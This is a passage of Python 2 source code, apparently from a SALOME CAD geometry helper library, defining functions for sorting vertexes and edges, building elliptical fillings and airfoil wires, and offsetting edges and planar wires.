compound_and_start = GetGUISelection(compound_and_start)
compound_and_start = GetObject(compound_and_start)
#-
# Check the input shape existence
if "error" in compound_and_start or None in compound_and_start: return
#-
# Check the number of selected objects
if len(compound_and_start) > 2:
print "[X] No more than two objects should be selected."
return
#-
# Distinguish input shapes
compound = None
start = None
for object in compound_and_start:
nb_vertexes = int(geompy.WhatIs(object).split("\n")[1].split(": ")[1])
if nb_vertexes == 1:
start = object
elif nb_vertexes > 1:
compound = object
if compound == None:
print "[X] None of selected objects is a compound containing several vertexes."
return
#-
# Set father object
father = None
if infa == True: father = compound
#-
if False: pass
else:# All checks done
# Get the sub-shapes
compound = GetSubShapes(compound)
resting_vertexes = compound[0]
nb_vertexes = len(resting_vertexes)
#-
# Get the start vertex
if start == None:
vertex_index = 0
else:
min_distance = 1e99
vertex_index = 0
for i in range(nb_vertexes):
vertex = resting_vertexes[i]
distance = geompy.MinDistance(vertex, start)
if distance < min_distance:
min_distance = distance
vertex_index = i
i += 1
#-
# Sort the vertexes
sorted_vertexes = []
for i in range(nb_vertexes):
vertex = resting_vertexes[vertex_index]
sorted_vertexes.append(vertex)
del resting_vertexes[vertex_index]
min_distance = 1e99
j = 0
for resting_vertex in resting_vertexes:
distance = geompy.MinDistance(resting_vertex, vertex)
if distance < min_distance:
min_distance = distance
vertex_index = j
j += 1
#-
if dim == 0:
to_return = sorted_vertexes
to_return_name = "CurveFromUnstortedVertexes (Vertex)"
if single == True:
compound = geompy.MakeCompound(to_return)
to_return = compound
to_return_name = "CurveFromUnstortedVertexes (Vertexes)"
else:
# Create the curve
if poly == True:
curve = geompy.MakePolyline(sorted_vertexes, close)
else:
curve = geompy.MakeInterpol(sorted_vertexes, close)
#-
to_return = curve
to_return_name = "CurveFromUnstortedVertexes"
# Add and return the resulting shape(s)
if add == True:
slow_add = False
if not isinstance(to_return, list) or single == True: slow_add = True
AddToStudy(to_return, to_return_name, father, suffix = slow_add, refresh = slow_add)
if slow_add == False:
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
return to_return
#-
mcfuv = MakeCurveFromUnsortedVertexes
def MakeEllipticalFilling( center, guides = [None], np = 20, parallel = False, single = True, add = True, dim = 2 ):
"""
Description:
Creates a filling face having all its section being elliptical.
Arguments:
# center
Description: The central edge of the elliptical filling.
Type: Edge
GUI selection: -
Selection by name: yes
Recursive: -
Default value: None
# guides
Description: The guiding edges.
Type: List of 2 Edges
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# np
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 10
# parallel
Description: If equals True, the elliptical sections of the filling are forced to be parallel.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 2
Returned Values:
"dim" value: 1
"single" value: False
Type: Edge
Number: n
Name: "EllipticalFilling (Edge)"
"dim" value: 1
"single" value: True
Type: Compound of Edges
Number: 1
Name: "EllipticalFilling (Edges)"
"dim" value: 2
"single" value: -
Type: Face
Number: 1
Name: "EllipticalFilling"
Conditions of use:
Triangles formed by vertexes taken at a same position on the center and guiding edges should be always rectangle.
"""
if isinstance(guides, list) == False: print "[X] The second argument (guides) should be an array."; return
if dim not in [1, 2]: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
guides = GetGUISelection(guides)
guides = GetObject(guides)
#-
# Check the input shape existence
if "error" in guides or None in guides: return
#-
# Check the number of selected objects
if len(guides) != 2:
print "[X] Two guiding edge should be selected."
return
#-
# Get the input shape(s)
[guide1, guide2, center] = GetObject(guides + [center], "GEOM")
#-
# Check the input shape characteritics
for object in [guide1, guide2, center]:
nb_edges = int(geompy.WhatIs(object).split("\n")[2].split(": ")[1])
if nb_edges != 1:
print "[X] Only edges should be selected."
return
#-
if False: pass
else:# All checks done
# Create ellipses
ellipses = []
if parallel == True:
# Get the cutting plane
center_edge_first_point = geompy.MakeVertexOnCurve(center, 0)
center_edge_last_point = geompy.MakeVertexOnCurve(center, 1)
cutting_plane = geompy.MakePlane(center_edge_first_point, center, 100000)
#-
for parameter in [n / float(np - 1) for n in range(np)]:
if parameter == 0:
local_guide1 = geompy.MakeVertexOnCurve(guide1, 0)
local_guide2 = geompy.MakeVertexOnCurve(guide2, 0)
local_center = center_edge_first_point
elif parameter == 1:
local_guide1 = geompy.MakeVertexOnCurve(guide1, 1)
local_guide2 = geompy.MakeVertexOnCurve(guide2, 1)
local_center = center_edge_last_point
else:
# Get the local center
local_center = geompy.MakeVertexOnCurve(center, parameter)
#-
# Translate the cutting plane
translated_cutting_plane = geompy.MakeTranslationTwoPoints(cutting_plane, center_edge_first_point, local_center)
translated_cutting_plane_wire = geompy.SubShapeAll(translated_cutting_plane, geompy.ShapeType["WIRE"])[0]
#-
# Get the local guide point 1
partition = geompy.MakePartition([translated_cutting_plane], [guide1], Limit = geompy.ShapeType["VERTEX"])
vertexes = geompy.SubShapeAll(partition, geompy.ShapeType["VERTEX"])
max_distance = 0
local_guide1 = None
for vertex in vertexes:
distance = geompy.MinDistance(vertex, translated_cutting_plane_wire)
if distance > max_distance:
local_guide1 = vertex
max_distance = distance
#-
# Get the local guide point 2
partition = geompy.MakePartition([translated_cutting_plane], [guide2], Limit = geompy.ShapeType["VERTEX"])
vertexes = geompy.SubShapeAll(partition, geompy.ShapeType["VERTEX"])
max_distance = 0
local_guide2 = None
for vertex in vertexes:
distance = geompy.MinDistance(vertex, translated_cutting_plane_wire)
if distance > max_distance:
local_guide2 = vertex
max_distance = distance
#-
# Create the local ellipse
ellipse = geompy.MakeArcOfEllipse(local_center, local_guide1, local_guide2)
#-
# Add the local ellipse to the list
ellipses.append(ellipse)
#-
#-
else:
for parameter in [n / float(np - 1) for n in range(np)]:
# Get the local points
local_guide1 = geompy.MakeVertexOnCurve(guide1, parameter)
local_guide2 = geompy.MakeVertexOnCurve(guide2, parameter)
local_center = geompy.MakeVertexOnCurve(center, parameter)
#-
# Create the local ellipse
ellipse = geompy.MakeArcOfEllipse(local_center, local_guide1, local_guide2)
#-
# Add the local ellipse to the list
ellipses.append(ellipse)
#-
# Put the ellipses into a compound
ellipse_compound = geompy.MakeCompound(ellipses)
#-
if dim == 1:
to_return = ellipses
to_return_name = "EllipticalFilling (Edge)"
if single == True:
to_return = ellipse_compound
to_return_name = "EllipticalFilling (Edges)"
else:
# Create the filling
elliptical_filling = geompy.MakeFilling(ellipse_compound, theMinDeg = 10, theMaxDeg = 15, theTol2D = 1e-5, theTol3D = 1e-5, theMethod = GEOM.FOM_AutoCorrect)
#-
to_return = elliptical_filling
to_return_name = "EllipticalFilling"
# Add and return the resulting shape(s)
if add == True:
slow_add = False
if not isinstance(to_return, list) or single == True: slow_add = True
AddToStudy(to_return, to_return_name, suffix = slow_add, refresh = slow_add)
if slow_add == False:
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
return to_return
#-
mef = MakeEllipticalFilling
def MakeFillingFromUnsortedEdges( compound_and_start = [None], single = True, add = True, infa = False, dim = 2 ):
"""
Description:
Creates a filling face using a set of edges in a random order, starting from a given vertex position.
Arguments:
# compound_and_start
Description: The compound of edges and the start vertex.
Type: List of 1 Compound of Edges+ 1 Vertex
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 2
Returned Values:
"dim" value: 1
"single" value: False
Type: Edge
Number: n
Name: "FillingFromUnstortedEdges (Edge)"
"dim" value: 1
"single" value: True
Type: Compound of Edges
Number: 1
Name: "FillingFromUnstortedEdges (Edges)"
"dim" value: 2
"single" value: -
Type: Face
Number: 1
Name: "FillingFromUnstortedEdges"
Conditions of use:
-
"""
if isinstance(compound_and_start, list) == False: print "[X] The first argument (compound_and_start) should be an array."; return
if dim == 0 or dim == 3: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
compound_and_start = GetGUISelection(compound_and_start)
compound_and_start = GetObject(compound_and_start)
#-
# Check the input shape existence
if "error" in compound_and_start or None in compound_and_start: return
#-
# Check the number of selected objects
if len(compound_and_start) > 2:
print "[X] No more than two objects should be selected."
return
#-
# Distinguish input shapes
compound = None
start = None
for object in compound_and_start:
nb_vertexes = int(geompy.WhatIs(object).split("\n")[1].split(": ")[1])
nb_edges = int(geompy.WhatIs(object).split("\n")[2].split(": ")[1])
if nb_vertexes == 1:
start = object
elif nb_edges > 1:
compound = object
compound = GetObject(compound, "GEOM")
start = GetObject(start, "GEOM")
if compound == None:
print "[X] None of selected objects is a compound containing several edges."
return
#-
# Set father object
father = None
if infa == True: father = compound
#-
if False: pass
else:# All checks done
# Get the sub-shapes
compound = GetSubShapes(compound)
resting_edges = compound[1]
nb_edges = len(resting_edges)
#-
# Get the start edge
if start == None:
edge_index = 0
else:
min_distance = 1e99
edge_index = 0
for i in range(nb_edges):
edge = resting_edges[i]
distance = geompy.MinDistance(edge, start)
if distance < min_distance:
min_distance = distance
edge_index = i
i += 1
#-
# Sort the edges
sorted_edges = []
for i in range(nb_edges):
edge = resting_edges[edge_index]
sorted_edges.append(edge)
del resting_edges[edge_index]
min_distance = 1e99
j = 0
for resting_edge in resting_edges:
distance = geompy.MinDistance(resting_edge, edge)
if distance < min_distance:
min_distance = distance
edge_index = j
j += 1
#-
# Create the edge compound
filling_edge_compound = geompy.MakeCompound(sorted_edges)
#-
if dim == 1:
to_return = sorted_edges
to_return_name = "FillingFromUnstortedEdges (Edge)"
if single == True:
to_return = filling_edge_compound
to_return_name = "FillingFromUnstortedEdges (Edges)"
else:
# Create the filling
filling = geompy.MakeFilling(filling_edge_compound, theMinDeg = 10, theMaxDeg = 15, theTol2D = 1e-5, theTol3D = 1e-5, theMethod = GEOM.FOM_AutoCorrect)
#-
to_return = filling
to_return_name = "FillingFromUnstortedEdges"
# Add and return the resulting shape(s)
if add == True:
slow_add = False
if not isinstance(to_return, list) or single == True: slow_add = True
AddToStudy(to_return, to_return_name, father, suffix = slow_add, refresh = slow_add)
if slow_add == False:
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
return to_return
#-
mffue = MakeFillingFromUnsortedEdges
def MakeFoilFromUnsortedVertexes( compound = None, coef = 1.5, coef2 = 0.02, strat = "grow", poly = False, angle = 60, add = True, infa = False ):
"""
Description:
Makes a foil wire from an unsorted compound of vertexes.
Arguments:
# compound
Description: The compound of vertexes describing the foil.
Type: List of 1 Compound of Vertexes + 1 Vertex
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# coef
Description: Coefficient influencing the search distance: search_distance = coef * mean_distance_between_vertexes
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1.5
# coef2
Description: When the foil curvature is very low, some vertexes can be skipped. This coefficient has an influence on skipped vertex detection. Lower it is, finer is the detection.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 0.02
# strat
Description: The search distance strategy. If equals "grow", the search distance increases until at least one nearby vertex is seen. If equals "stop", the algorithm stops when no nearby vertex is seen within the search distance.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "grow"
# poly
Description: If True, the output wire is made of straights edges. If False, the output wire is made of smooth edge.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# angle
Description: The feature angle in degrees.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 60
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
Returned Values:
"dim" value: -
"single" value: -
Type: Wire
Number: 1
Name: "FoilFromUnsortedVertexes"
Conditions of use:
The input vertex compound must be planar.
"""
input_shape = compound
# Get the input shape(s)
input_shape = GetGUISelection(input_shape)
input_shape = GetObject(input_shape)
#-
# Make this function recursive
if isinstance(input_shape, list):
return_list = []
for sub_object in input_shape:
return_list.append(MakeFoilFromUnsortedVertexes(sub_object, coef, coef2, strat, poly, angle, add, infa))
return return_list
#-
# Check the input shape existence
if "error" in [input_shape] or None in [input_shape]: return
#-
# Check the input shape type
nb_vertexes = geompy.NumberOfSubShapes(input_shape, geompy.ShapeType["VERTEX"])
if nb_vertexes < 2:
print "[X] The first argument (compound) should contain more than one vertex."; return
#-
# Set father object
father = None
if infa == True: father = input_shape
#-
compound = input_shape
if False: pass
else:# All checks done
feature_angle = angle
# Get the sub-shapes
compound = GetSubShapes(compound)
resting_vertexes = compound[0]
nb_vertexes = len(resting_vertexes)
#-
# Get the biggest dimension of the compound
[x_min, x_max, y_min, y_max, z_min, z_max ] = geompy.BoundingBox(compound[-1])
x = (x_min + x_max) / 2.0
y = (y_min + y_max) / 2.0
z = (z_min + z_max) / 2.0
center = geompy.MakeVertex(x, y, z)
farest_vertex_1 = None
farest_vertex_1_id = None
max_distance = 0
i = 0
for vertex in resting_vertexes:
distance = geompy.MinDistance(vertex, center)
if distance > max_distance:
farest_vertex_1 = vertex
farest_vertex_1_id = i
max_distance = distance
i += 1
farest_vertex_2 = None
max_distance = 0
for vertex in resting_vertexes:
distance = geompy.MinDistance(vertex, farest_vertex_1)
if distance > max_distance:
farest_vertex_2 = vertex
max_distance = distance
biggest_dimension = geompy.MinDistance(farest_vertex_1, farest_vertex_2)
#-
# Define the search distance
nb_profile_vertexes = len(resting_vertexes)
mean_distance_between_vertexes = 2.0 * biggest_dimension / nb_profile_vertexes
search_distance = coef * mean_distance_between_vertexes
initial_search_distance = search_distance
#-
# Initialize the sorted vertex list
sorted_vertexes = [resting_vertexes[farest_vertex_1_id]]
del resting_vertexes[farest_vertex_1_id]
#-
# As long as there are non sorted vertexes...
while len(resting_vertexes) > 0:
last_vertex = sorted_vertexes[-1]
vertex_to_delete_ids = []
# Get vertexes being relatively close
closest_vertexes = []
closest_vertex_indexes = []
i = 0
for resting_vertex in resting_vertexes:
distance = geompy.MinDistance(resting_vertex, last_vertex)
if distance < search_distance:
closest_vertexes.append(resting_vertex)
closest_vertex_indexes.append(i)
i += 1
if len(closest_vertexes) == 0:
if strat == "grow":
search_distance *= 1.1
continue
else:# "stop"
break
search_distance = initial_search_distance
#-
# Get the next vertex
best_vertex = None
if len(sorted_vertexes) == 1:
i = 0
min_distance = 1e99
for vertex in closest_vertexes:
distance = geompy.MinDistance(vertex, last_vertex)
if distance < min_distance:
best_vertex = vertex
best_vertex_index = i
min_distance = distance
i += 1
else:
previous_vertex = sorted_vertexes[ - 2]
last_vector = geompy.MakeVector(previous_vertex, last_vertex)
i = 0
min_angle = 1e99
for vertex in closest_vertexes:
vector = geompy.MakeVector(last_vertex, vertex)
angle = geompy.GetAngleVectors(last_vector, vector)
if angle < min_angle:
best_vertex = vertex
best_vertex_index = i
min_angle = angle
i += 1
#-
# Remove it from the resting vertex list
sorted_vertexes.append(best_vertex)
vertex_to_delete_ids.append(closest_vertex_indexes[best_vertex_index])
#-
# Check if the segment covers other vertexes
segment = geompy.MakeEdge(last_vertex, best_vertex)
segment_length = geompy.BasicProperties(segment)[0]
tol = segment_length * coef2
i = 0
for vertex in closest_vertexes:
if i != best_vertex_index:
distance = geompy.MinDistance(vertex, segment)
if distance <= tol:
vertex_to_delete_ids.append(closest_vertex_indexes[i])
i += 1
#-
# Delete the suitable vertexes from the resting vertex list
# http: / / stackoverflow.com / a / 28697246 / 2123808
for vertex_to_delete_id in sorted(vertex_to_delete_ids, reverse = True):
del resting_vertexes[vertex_to_delete_id]
#-
#-
# Create the wire
if poly == False:
# Look for a feature angle
v1 = sorted_vertexes[0]
v2 = sorted_vertexes[1]
[dx, dy, dz] = geompy.MinDistanceComponents(v1, v2)[1:4]
last_vector = geompy.MakeVectorDXDYDZ(dx, dy, dz)
first_vertex_indice = None
nb_sorted_vertexes = len(sorted_vertexes)
for i in range(nb_sorted_vertexes):
if i > 0:
next_i = i + 1
if next_i == nb_sorted_vertexes:
next_i = 0
v1 = sorted_vertexes[i]
v2 = sorted_vertexes[next_i]
[dx, dy, dz] = geompy.MinDistanceComponents(v1, v2)[1:4]
new_vector = geompy.MakeVectorDXDYDZ(dx, dy, dz)
angle = geompy.GetAngle(last_vector, new_vector)
if angle >= feature_angle:
first_vertex_indice = i
break
last_vector = new_vector
if first_vertex_indice == None:
shift = 0
first_vertex = sorted_vertexes[0]
else:
shift = first_vertex_indice
first_vertex = sorted_vertexes[first_vertex_indice]
#-
# Create curves
index_1 = shift
if index_1 >= nb_sorted_vertexes:
index_1 -= nb_vertexes
index_2 = shift + 1
if index_2 >= nb_sorted_vertexes:
index_2 -= nb_vertexes
v1 = sorted_vertexes[index_1]
v2 = sorted_vertexes[index_2]
[dx, dy, dz] = geompy.MinDistanceComponents(v1, v2)[1:4]
last_vector = geompy.MakeVectorDXDYDZ(dx, dy, dz)
curves = []
curve_vertexes = [first_vertex]
for i in range(nb_sorted_vertexes):
i = i + shift
if i > shift:
if i >= nb_sorted_vertexes:
i -= nb_sorted_vertexes
next_i = i + 1
if next_i == nb_sorted_vertexes:
next_i = 0
v1 = sorted_vertexes[i]
v2 = sorted_vertexes[next_i]
[dx, dy, dz] = geompy.MinDistanceComponents(v1, v2)[1:4]
new_vector = geompy.MakeVectorDXDYDZ(dx, dy, dz)
angle = geompy.GetAngle(last_vector, new_vector)
if angle >= feature_angle:
curve_vertexes.append(v1)
curve = geompy.MakeInterpol(curve_vertexes)
curves.append(curve)
curve_vertexes = [v1]
else:
curve_vertexes.append(v1)
last_vector = new_vector
curve_vertexes.append(first_vertex)
curve = geompy.MakeInterpol(curve_vertexes)
curves.append(curve)
wire = geompy.MakeWire(curves)
#-
else:
wire = geompy.MakePolyline(sorted_vertexes, True)
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(wire, "FoilFromUnsortedVertexes", father)
return wire
#-
mffuv = MakeFoilFromUnsortedVertexes
def MakeEdgeOffset( dist, edge = None, pos = [0, 1], face = None, plane = None, np = 20, curv = True, close = False, rebuild = True, tol = 1e-7, rev = False, single = True, add = True, infa = False, dim = 1 ):
"""
Description:
Creates an offset of an edge.
Arguments:
# dist
Description: The offset distance. Must be an list to create a variable offset.
Type: Float or List of Floats
GUI selection: -
Selection by name: -
Recursive: -
Default value: -
# edge
Description: The input edge.
Type: Edge
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# pos
Description: The positions on the source edge (0 < pos < 1). Only necessary if the dist argument is an list.
Type: List of Floats
GUI selection: -
Selection by name: -
Recursive: -
Default value: [0,1]
# face
Description: See here.
Type: Face
GUI selection: -
Selection by name: yes
Recursive: -
Default value: None
# plane
Description: See here. If the input edge is straight, the default plane is the OXY plane.
Type: Face
GUI selection: -
Selection by name: yes
Recursive: -
Default value: None
# np
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 50
# curv
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# rebuild
Description: In case dim = 2, defines if the input edge has to be rebuilt in the same way than the offset edge.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# close
Description: If equals True, the offset edge is linked to the source edge by two additional edges.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# rev
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1
Returned Values:
"dim" value: 0
"single" value: False
Type: Vertex
Number: n
Name: "EdgeOffset (Vertex)"
"dim" value: 0
"single" value: True
Type: Compound of Vertexes
Number: 1
Name: "EdgeOffset (Vertexes)"
"dim" value: 1
"single" value: False
Type: Edge
Number: 3
Name: "ClosedEdgeOffset (Edge)"
"dim" value: 1
"single" value: True
Type: Compound of Edges
Number: 1
Name: "EdgeOffset" or "ClosedEdgeOffset"
"dim" value: 2
"single" value: -
Type: Face
Number: 1
Name: "EdgeOffset (Face)"
Conditions of use:
The input edge has to be open.
In addition, if the input edge is straight, it is also necessary to set the face or the plane argument so as the function knows the offset direction
"""
if dim not in [0, 1, 2]: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
edge = GetGUISelection(edge)
[edge, face, plane] = GetObject([edge, face, plane])
#-
# Make this function recursive
if isinstance(edge, list):
return_list = []
for sub_object in edge:
return_list.append(MakeEdgeOffset(dist, sub_object, pos, face, plane, np, curv, close, rebuild, tol, rev, single, add, infa, dim))
return return_list
#-
# Check the input shape existence
if "error" in [edge, face, plane] or None in [edge]: return
#-
# Check the input shape types
if geompy.NumberOfEdges(edge) != 1:
print "[X] The second argument (edge) should be a single edge."; return
if face != None and geompy.NumberOfFaces(face) != 1:
print "[X] The fourth argument (face) should be a single face."; return
if plane != None and geompy.NumberOfFaces(plane) != 1:
print "[X] The fifth argument (plane) should be a single face."; return
#-
# Set father object
father = None
if infa == True: father = edge
#-
if False: pass
else:# All checks done
# Get the sub-shapes
edge = GetSubShapes(edge)
#-
if face == None:# If no face is given by the user...
if plane == None:# And if no plane is given by the user...
# Check if the edge is closed
boundary_vertexes = GetBoundaryVertexes(edge[-1], add = False, single = False)
edge_is_closed = False
if boundary_vertexes == None:
edge_is_closed = True
#-
if edge_is_closed == True:# If it is closed...
# Get the edge plane
plane = geompy.MakeFace(edge[-1], True)
#-
else:
# Close the input edge
closing_edge = geompy.MakeEdge(edge[0][0], edge[0][1])
closed_contour = geompy.MakeWire([edge[-1], closing_edge])
#-
if abs(geompy.BasicProperties(closing_edge)[0] - geompy.BasicProperties(edge[-1])[0]) < tol:# If the input wire is straight...
# Use the OXY plane
plane = geompy.MakeFaceHW(10, 10, 1)
#-
else:
# Get the edge plane
plane = geompy.MakeFace(closed_contour, True)
#-
# Get the plane normal
normal = geompy.GetNormal(plane)
#-
# Extrude the edge perpendicular to its plane (to get its normal further)
face = geompy.MakePrismVecH(edge[-1], normal, 0.1)
#-
offset_vertexes = []
# Get the list of positions on the edge where to compute the offset
if curv == True:
parameter_list = DiscretizeEdgeByCurvature(edge[-1], np, dim = -1)
else:
parameter_list = [n / float(np) for n in range(np + 1)]
#-
# Create the offset vertexes
for parameter in parameter_list:
vertex = geompy.MakeVertexOnCurve(edge[-1], parameter)
normal = geompy.GetNormal(face, vertex)
if dist == None:
edge_length = geompy.BasicProperties(edge[-1])[0]
dist = edge_length / 100
print "[i] No offset distance given > default one:", dist
if isinstance(dist, list):
#### Here the numpy function interp() was replaced by code doing the same thing.
#offsetDistance = numpy.interp(parameter, pos, dist)
for i in range(len(pos) - 1):
if parameter >= pos[i] and parameter < pos[i + 1]:
slope = (dist[i + 1] - dist[i]) / (pos[i + 1] - pos[i])
offset_distance = dist[i] + (parameter - pos[i]) * slope
if parameter == pos[-1]:
offset_distance = dist[-1]
#### -
else:
offset_distance = dist
if rev == True:
offset_distance *= -1.0
offset_vertex = geompy.MakeTranslationVectorDistance(vertex, normal, offset_distance)
offset_vertexes.append(offset_vertex)
#-
if dim == 0:# If the output dimension is 0...
to_return = offset_vertexes
to_return_name = "EdgeOffset (Vertex)"
if single == True:
compound = geompy.MakeCompound(offset_vertexes)
to_return = compound
to_return_name = "EdgeOffset (Vertexes)"
else:
# Create the offset spline
offset_spline = geompy.MakeInterpol(offset_vertexes)
#-
to_return = offset_spline
to_return_name = "EdgeOffset"
if dim == 1 and close == True:
# Create the intermediate edges
offset_vertexes = geompy.SubShapeAll(offset_spline, geompy.ShapeType["VERTEX"])
offset_edges = [offset_spline]
intermediate_edge = geompy.MakeEdge(geompy.MakeVertexOnCurve(edge[-1], 0), offset_vertexes[0])
offset_edges.append(intermediate_edge)
intermediate_edge = geompy.MakeEdge(geompy.MakeVertexOnCurve(edge[-1], 1), offset_vertexes[1])
offset_edges.append(intermediate_edge)
#-
to_return = offset_edges
to_return_name = "ClosedEdgeOffset (Edge)"
if single == True:
compound = geompy.MakeCompound(offset_edges)
to_return = compound
to_return_name = "ClosedEdgeOffset"
if dim == 2:
# Rebuild edges if necessary
if rebuild == True:
parameter_list = DiscretizeEdgeByCurvature(edge[-1], np, dim = -1)
edge[-1] = RebuildSpline(parameter_list, edge[-1], add = False)
offset_spline = RebuildSpline(parameter_list, offset_spline, add = False)
#-
# Link the edge to the offset
##########################################
linking_face = geompy.MakeQuad2Edges(edge[-1], offset_spline) # This shown better meshing quality
#tmp_compound = geompy.MakeCompound([edge, offset])
#linking_face = geompy.MakeFilling(tmp_compound, theMethod = GEOM.FOM_AutoCorrect)
##########################################
#-
to_return = linking_face
to_return_name = "EdgeOffset (Face)"
# Add and return the resulting shape(s)
if add == True:
slow_add = False
if not isinstance(to_return, list) or single == True: slow_add = True
AddToStudy(to_return, to_return_name, father, suffix = slow_add, refresh = slow_add)
if slow_add == False:
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
return to_return
#-
meo = MakeEdgeOffset
def MakePlanarWireOffset( dist, wire = None, plane = None, np = 50, curv = True, simple = False, angle = 15, rebuild = True, tol = 1e-7, rev = False, single = True, add = True, infa = False, dim = 1 ):
"""
Description:
Creates an offset of a planar wire.
Arguments:
# dist
Description: The offset distance.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: -
# wire
Description: The input wire.
Type: Wire
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# plane
Description: See here. If the input wire is straight, the default plane is the OXY plane.
Type: Face
GUI selection: -
Selection by name: yes
Recursive: -
Default value: None
# np
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 50
# curv
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# angle
Description: The angle in degrees above which an arc is added between two offset edges.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 15
# rebuild
Description: In case dim = 2, defines if the input edge has to be rebuilt in the same way than the offset edge.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# rev
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1
Returned Values:
"dim" value: 1
"single" value: False
Type: Edge
Number: n
Name: "WireOffset (Edge)"
"dim" value: 1
"single" value: True
Type: Wire or Compound of Edges
Number: 1
Name: "WireOffset"
"dim" value: 2
"single" value: False
Type: Face
Number: n
Name: "WireOffset (Face)"
"dim" value: 2
"single" value: True
Type: Shell or Compound of Faces
Number: 1
Name: "WireOffset (Faces)"
Conditions of use:
-
"""
if dim not in [1, 2]: print "[X] There is no shape to return corresponding to the given dimension."; return
input_shape = wire
# Get the input shape(s)
input_shape = GetGUISelection(input_shape)
[input_shape, plane] = GetObject([input_shape, plane])
#-
# Make this function recursive
if isinstance(input_shape, list):
return_list = []
for sub_object in input_shape:
return_list.append(MakePlanarWireOffset(dist, sub_object, plane, np, curv, simple, angle, rebuild, tol, rev, single, add, infa, dim))
return return_list
#-
# Check the input shape existence
if "error" in [input_shape, plane] or None in [input_shape]: return
#-
# Set father object
father = None
if infa == True:
father = input_shape
#-
wire = input_shape
if False: pass
else:# All checks done
if rev == True: dist *= -1.0
small_value = 1e-3
# Check if the group is "wire-shaped"
wire_edge_list = GetSubShapes(wire)[1]
try:
wire = geompy.MakeWire(wire_edge_list)
except:
print "[X] The input shape should be \"wire-shaped\"."; return
#-
# Check if the wire is closed
boundary_vertexes = GetBoundaryVertexes(wire, add = False, single = False)
wire_is_closed = False
if boundary_vertexes == None:
wire_is_closed = True
#-
# Reorder wire edges
edges = GetReorderedEdges(wire, add = False)
nb_edges = len(edges)
#-
# Get the input wire length
wire_length = geompy.BasicProperties(wire)[0]
#-
if plane == None:# If no plane is given by the user...
# Close the input edge
wire_is_straigth = False
if not wire_is_closed:
closing_edge = geompy.MakeEdge(boundary_vertexes[0], boundary_vertexes[1])
closing_edge_length = geompy.BasicProperties(closing_edge)[0]
closed_contour = geompy.MakeWire([wire, closing_edge])
# Check if the wire is straight
if abs(closing_edge_length - wire_length) < tol:
wire_is_straigth = True
else:
closed_contour = wire
#-
if wire_is_straigth:
# Use the OXY plane
plane = geompy.MakeFaceHW(10, 10, 1)
#-
else:
# Get the wire plane
plane = geompy.MakeFace(closed_contour, True)
if geompy.NumberOfFaces(plane) > 1:
plane = geompy.SubShapeAll(plane, geompy.ShapeType["FACE"])[0]
#-
# Get the plane normal
normal = geompy.GetNormal(plane)
#-
# Check if the wire is planar
some_vertex_from_wire = GetSubShapes(wire)[0][0]
